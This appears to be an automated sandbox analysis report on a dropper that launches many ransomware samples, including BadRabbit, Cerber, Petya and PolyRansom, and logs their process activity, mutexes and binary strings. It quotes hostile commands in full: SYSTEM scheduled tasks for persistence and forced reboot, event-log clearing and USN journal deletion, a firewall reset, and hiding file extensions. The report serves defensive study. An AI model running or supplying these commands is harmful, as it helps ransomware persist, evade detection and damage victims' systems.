        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe "C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "E"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Windows\dispci.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe "C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe"
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: C:\Users\user\fakAAcAY\dekAkckQ.exe C:\Users\user\fakAAcAY\dekAkckQ.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: C:\ProgramData\vsMwMYIk\LOAcQQUU.exe C:\ProgramData\vsMwMYIk\LOAcQQUU.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe "C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe "C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe "C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe "C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe "C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe "C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe "C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2112656973 && exit"Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:06:00Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\EF39.tmp "C:\Windows\EF39.tmp" \\.\pipe\{96A4BC70-5646-4F34-828D-297F35E216CA}Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state onJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall resetJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2112656973 && exit"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:06:00
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 2112656973
        Source: C:\Windows\dispci.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "E"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: C:\Users\user\fakAAcAY\dekAkckQ.exe C:\Users\user\fakAAcAY\dekAkckQ.exe
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: C:\ProgramData\vsMwMYIk\LOAcQQUU.exe C:\ProgramData\vsMwMYIk\LOAcQQUU.exe
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom"
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: unknown unknown
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: unknown unknown
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04777CC5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,12_2_04777CC5
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;explorer.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;E&quot;)
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\vizhwbnh.yazJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00409E5A GetDiskFreeSpaceA,11_2_00409E5A
        Source: Error file remover.msi.57.drBinary or memory string: INSERT INTO `` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYComboBoxListBoxSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'DELETE FROM `%s` WHERE `Property`='%s' [1]SELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1;WS_EX_LAYOUTRTLWS_EX_NOINHERITLAYOUTWS_EX_NOACTIVATEWS_EX_LAYEREDWS_EX_RIGHTWS_EX_RIGHTSCROLLBARWS_EX_WINDOWEDGEWS_EX_TRANSPARENTWS_EX_TOPMOSTWS_EX_TOOLWINDOWWS_EX_STATICEDGEWS_EX_RTLREADINGWS_EX_PALETTEWINDOWWS_EX_OVERLAPPEDWINDOWWS_EX_NOPARENTNOTIFYWS_EX_MDICHILDWS_EX_LTRREADINGWS_EX_LEFTSCROLLBARWS_EX_LEFTWS_EX_DLGMODALFRAMEWS_EX_CONTROLPARENTWS_EX_CONTEXTHELPWS_EX_CLIENTEDGEWS_EX_APPWINDOWWS_EX_ACCEPTFILESWS_TILEDWS_TILEDWINDOWWS_POPUPWS_POPUPWINDOWWS_OVERLAPPEDWS_OVERLAPPEDWINDOWWS_MINIMIZEWS_MINIMIZEBOXWS_MAXIMIZEWS_MAXIMIZEBOXWS_VSCROLLWS_VISIBLEWS_THICKFRAMEWS_TABSTOPWS_SYSMENUWS_SIZEBOXWS_ICONICWS_HSCROLLWS_GROUPWS_DLGFRAMEWS_DISABLEDWS_CLIPSIBLINGSWS_CLIPCHILDRENWS_CHILDWINDOWWS_CHILDWS_CAPTIONWS_BORDERWS_EXAI_TRIAL_MESSAGE_BODYAI_MSM_TRIAL_MESSAGE_BODYAI_APP_FILEAI_README_FILEAI_APP_ARGSGetProcessIdKernel32.dllMsiLogFileLocationrunasRunAsAdminFileRunAsAdminCmdRunAsAdminWorkingDir[AdminToolsFolder][TemplateFolder][StartupFolder][DesktopFolder][ProgramMenuFolder][WindowsVolume][SystemFolder][LocalAppDataFolder][WindowsFolder][AI_ProgramFiles][CommonFiles64Folder][LocalAppDataFolder]Programs\Common\[CommonFilesFolder][ProgramFiles64Folder][LocalAppDataFolder]Programs\[ProgramFilesFolder]MIGRATEFindRelatedProductsMigrateFeatureStatesAI_SETMIXINSTLOCATIONAPPDIRAI_RESTORE_LOCATIONSELECT `ActionProperty` FROM `Upgrade`ProgramMenuFolderAI_SH_INITEDSELECT `Action`,`Target` FROM `CustomAction`SET_APPDIRSET_SHORTCUTDIRSHORTCUTDIRAI_InstallPerUser = "0"ALLUSERS = "2"MSIINSTALLPERUSER = "1"1ALLUSERSVersionMsi >= "5.0"2AI_InstallPerUser = "1"MSIINSTALLPERUSERMSINEWINSTANCEProductLanguageAI_INTANCE_LOCATIONAI_UPGRADENoOLDPRODUCTSLanguageVersionStringInstallLocationAI_REPLACE_PRODUCTSAI_Replaced_Versions_ListAI_Upgrade_Replace_Question_YesBackUp_AI_Upgrade_Question_YesAI_Upgrade_Question_YesAI_Upgrade_Replace_Question_NoBackUp_AI_Upgrade_Question_NoAI_Upgrade_Question_NoYesDELETE FROM `Shortcut` WHERE `Shortcut`.`Directory_`='%s'DELETE FROM `IniFile` WHERE `IniFile`.`Section`='InternetShortcut' AND`IniFile`.`DirProperty`='%s'SELECT * FROM `%s`ShortcutIniFileAI_DESKTOP_SH0|AI_STARTMENU_SHAI_QUICKLAUNCH_SHAI_STARTUP_SHAI_SHORTCUTSREGNot InstalledDesktopFolderQuickLaunch_DirStartupFolderAI_SH_DIRProductName*.*Riched20.dll -user -machine -quiet -addgroup All_CodeMy_Computer_Zone -url "*" Nothing -name "" -addgroup " FullTrust -remgroup "SELECT `Component` FROM `Component`AI_ARP_SIZEARPPRODUCTICONWindowsFolderProductCodeAppDataFolderInstaller\ARP_ICON_PATHMicrosoftAI_BIND_TCP_HOSTAI_SEARCH_TCP_PORTSockErrorAI_PORT_TEST_RESFreePortAI_BIND_TCP_PORTUsedPortAI_FREE_DISK_SPACE&,WarningAI_MESSAGEBOX_TEXTMB_ABORTRETRYIG
        Source: 1jDe7zWnoe.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_047784EE CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,12_2_047784EE
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9424:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1244:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:13144:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeMutant created: \Sessions\1\BaseNamedObjects\EskQkwYs
        Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\8E5B75203AD6FDE5
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeMutant created: \Sessions\1\BaseNamedObjects\RaUQQwEA
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5524:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9416:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8340:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:680:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeMutant created: \Sessions\1\BaseNamedObjects\shell.ipc.{FE4A3029-0048-A1E0-6D98-0C1ED446F493}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5100:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_01
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\vsMwMYIk\LOAcQQUU.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeAutomated click: Continue
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeAutomated click: Continue
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeAutomated click: Continue
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: 1jDe7zWnoe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: 1jDe7zWnoe.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: msi.pdb source: shiAB02.tmp.57.dr
        Source: Binary string: tscorlib.pdb source: Endermanch@DeriaLock.exe, 00000013.00000002.587407293.0000000000B31000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: X:\_WORK\encrypter\HiddenTear\Myexperements\hidden-tear-master\testfunction1\winupdate\WindowsFormsApplication5working\WindowsFormsApplication5\obj\Release\WindowsUpdate.pdb source: WindowsUpdate.exe.21.dr
        Source: Binary string: criticalupdate01.pdb source: Fantom.exe, 00000015.00000002.603139668.000000000221E000.00000004.00000800.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.317298815.00000000007FA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe, 0000001D.00000000.318134317.0000000000813000.00000002.00000001.01000000.0000000F.sdmp, Endermanch@InfinityCrypt.exe.0.dr
        Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe, 0000001D.00000000.318837348.0000000000832000.00000002.00000001.01000000.0000000F.sdmp, Endermanch@InfinityCrypt.exe.0.dr
        Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb0#AD#A source: Endermanch@AntivirusPlatinum.exe.0.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\AICustAct.pdb source: Error file remover.msi.57.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\aischeduler.pdb source: Error file remover.msi.57.dr
        Source: Binary string: _.pdb source: Fantom.exe, 00000015.00000003.339800325.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.331454634.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.329696498.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000002.603139668.000000000221E000.00000004.00000800.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.333521051.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.329275374.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.326540763.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.317298815.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.330476873.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.329351499.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.328467214.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.330050682.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.328833959.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Fantom.exe, 00000015.00000003.332731159.0000000000824000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\stubs\x86\ExternalUi.pdb source: Endermanch@WinlockerVB6Blacksod.exe, 00000039.00000000.415216580.00000000009CE000.00000002.00000001.01000000.00000018.sdmp, Endermanch@WinlockerVB6Blacksod.exe.0.dr
        Source: Binary string: GoogleCrashHandler_unsigned.pdb} source: Endermanch@Petya.A.exe, 0000002F.00000000.351611217.0000000000428000.00000002.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.540745824.0000000000428000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: msi.pdbUGP source: shiAB02.tmp.57.dr
        Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Endermanch@AntivirusPlatinum.exe.0.dr
        Source: Binary string: GoogleCrashHandler_unsigned.pdb source: Endermanch@Petya.A.exe, 0000002F.00000000.351611217.0000000000428000.00000002.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.540745824.0000000000428000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\aischeduler2.pdb source: Error file remover.msi.57.dr
        Source: Binary string: Y:\35\z1h\3uhpi3uv\1u\jq8jvj\1ao\n\2no\d4uongw.pdb source: Endermanch@AntivirusPro2017.exe.0.dr
        Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 00000013.00000000.311063091.0000000000362000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: dcrypt.pdb source: rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: Endermanch@DeriaLock.exe, 00000013.00000002.600679301.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\stubs\x86\ExternalUi.pdbL source: Endermanch@WinlockerVB6Blacksod.exe, 00000039.00000000.415216580.00000000009CE000.00000002.00000001.01000000.00000018.sdmp, Endermanch@WinlockerVB6Blacksod.exe.0.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\AICustAct.pdb,0 source: Error file remover.msi.57.dr

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeUnpacked PE file: 13.2.Endermanch@Cerber5.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeUnpacked PE file: 13.2.Endermanch@Cerber5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_0041714C push 00417178h; ret 11_2_00417170
